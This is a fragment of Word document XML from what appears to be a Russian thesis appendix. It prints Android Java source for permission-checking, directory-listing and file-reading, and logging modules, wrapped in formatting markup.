              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>postTime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"key"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>uniqueKey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sendNotification</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</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 {</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            e.printStackTrace();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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRDefault="00753BE3" w:rsidP="001E447A">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc61505589"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>М</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:r w:rsidR="001E447A" w:rsidRPr="001E447A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B03B72" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Исходный код </w:t>
      </w:r>
      <w:r w:rsidR="00976B16">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>модуля разрешений</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A01E47" w:rsidRPr="00F870DF"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android.content.pm.PackageInfo</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Permissions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getGranted</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PackageInfo packageInfo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().getPackageManager().getPackageInfo(</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 xml:space="preserve">().getPackageName(), </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PackageManager</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GET_PERMISSIONS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 i++)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requestedPermissionsFlags</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[i] &amp;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i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>REQUESTED_PERMISSION_GRANTED</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">) !=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[i]);</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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00976B16" w:rsidRDefault="00753BE3" w:rsidP="00976B16">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc61505590"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="00976B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Н</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidR="00976B16" w:rsidRPr="00976B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B03B72" w:rsidRDefault="00976B16" w:rsidP="00976B16">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Исходный код модуля файлов</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A01E47" w:rsidRPr="00F870DF"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java.io.FileNotFoundException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Files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dir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.canRead())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"error"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"Access denied"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sendError</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JSONObject </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>walk</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">File </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sourceFile) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">JSONObject result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sourceFile.getName());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"isDir"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, sourceFile.isDirectory());</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"path"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, sourceFile.getAbsoluteFile());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"size"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, sourceFile.length() / </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1750EB"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1024</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(sourceFile.isDirectory()) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">files </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>= sourceFile.listFiles();</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0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>files</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"files"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">,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33B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">public static void </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>download</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 xml:space="preserve">(path ==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int </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">size </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>= (</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>int</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.length();</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">data </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>new byte</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>size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BufferedInputStream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BufferedInputStream(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">new </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FileInputStream(</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.read(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>data</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1750EB"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0</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xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>file</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.getName());</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"buffer"</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downloadFile</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FileNotFoundException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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00976B16" w:rsidRDefault="00753BE3" w:rsidP="00976B16">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc61505591"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ</w:t>
      </w:r>
      <w:r w:rsidRPr="00976B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:r w:rsidR="00976B16" w:rsidRPr="00976B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B03B72" w:rsidRDefault="00976B16" w:rsidP="00976B16">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Исходный код модуля логгирования</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="001354A0" w:rsidRPr="00F870DF" w:rsidTr="00976B16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001354A0" w:rsidRDefault="001354A0" w:rsidP="001354A0">
            <w:pPr>
              <w:pStyle w:val="HTML"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:rPr>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java.io.BufferedWriter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java.io.FileWriter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java.util.Calendar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java.util.Date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Logger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log</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message) {</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>log</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"info"</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, message);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log</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 xml:space="preserve">type, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>message) {</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context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logFile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.getExternalFilesDir(</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android.text.format.DateFormat</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>format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"yyyy-MM-dd"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i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>getCurrentDate</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">        ).toString()</w:t>
            </w:r>
            <w:r>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logFile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logFile</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.createNewFile();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StringBuilder sb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StringBuilder();</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">String currentDate </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>android.text.format.DateFormat</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>format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"yyyy-MM-dd HH:mm:ss"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i/>
                <w:iCs/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>getCurrentDate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            ).toString();</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">BufferedWriter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BufferedWriter(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">new </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>FileWriter(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>logFile</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0033B3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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.append(</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">"[" </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">+ </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">currentDate </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">+ </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">"] [" </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">+ type.toUpperCase() + </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="067D17"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">"] : " </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>+ message);</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.newLine();</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntStackTrace();</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
            <w:r>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Date </w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="00627A"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>getCurrentDate</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Calendar</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="080808"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00A01E47">
